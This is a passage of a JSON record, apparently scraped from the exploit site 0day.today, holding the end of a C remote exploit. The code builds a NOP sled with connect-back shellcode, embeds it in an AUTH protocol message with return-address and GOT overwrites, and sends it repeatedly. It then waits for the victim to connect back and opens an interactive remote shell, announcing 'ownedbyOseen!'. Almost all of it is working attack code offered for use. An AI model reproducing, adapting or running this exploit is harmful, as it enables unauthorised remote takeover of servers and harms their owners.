}\r\n for(; i < 300 - sizeof(linux_connect_back) - 1; i++)\r\n buf1[i + 24] = 0x90;\r\n strcpy(buf1 + i + 24, linux_connect_back);\r\n buf1[i + 24+ sizeof(linux_connect_back) - 1] = '\\n';\r\n buf1[i + 25 + sizeof(linux_connect_back) - 1] = '\\0';\r\n\r\n sprintf(buf2, \"k0000023CAUTH HARE KRISHNA HAREk0003000SAUTH n00000010 00001000%s\\r\\n\", buf1);\r\n\r\n fprintf(stdout, \"Connected, sending code...\\n\");\r\n fprintf(stdout, \"[+] Ret: 0x%08x\\n\", targets[type - 1].ret);\r\n fprintf(stdout, \"[+] Got: 0x%08x\\n\", targets[type - 1].got);\r\nwhile(1) {\r\n write(sock, buf2, strlen(buf2));\r\n close(sock);\r\n sleep(2);\r\n FD_ZERO(&fdread);\r\n FD_SET(listener, &fdread);\r\n\r\n timeout.tv_sec = time_out;\r\n timeout.tv_usec = 0;\r\n\r\n while(1) {\r\n\r\n ret = select(FD_SETSIZE, &fdread, NULL, NULL, &timeout);\r\n\r\n if (ret < 0) {\r\n close(sock);\r\n close(listener);\r\n fprintf(stderr, 
\"select() error.\\n\");\r\n return -1;\r\n }\r\n\r\n if (ret == 0) {\r\n fprintf(stderr, \"[+] Failed, waiting %d seconds.\\n\"\r\n \"[+] Use ctrl-c to abort.\\n\", delay);\r\n sleep(delay);\r\n break;\r\n }\r\n\r\n if(FD_ISSET(listener, &fdread)) {\r\n sock2 = accept(listener, (struct sockaddr *)&sin_listener, &sin_len);\r\n close(sock);\r\n close(listener);\r\n\r\n fprintf(stderr, \"[+] ownedbyOseen!\\n\"\r\n \"-----------------------------------------------------------\\n\");\r\n shell(sock2);\r\n close(sock2);\r\n return 0;\r\n }\r\n }\r\n\r\n }\r\n\r\n fprintf(stderr, \"[+] Exploit failed.\\n\");\r\n close(listener);\r\n close(sock);\r\n return 0;\r\n\r\n}\r\n\r\n\n# 0day.today [2018-01-10] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/8525"}]}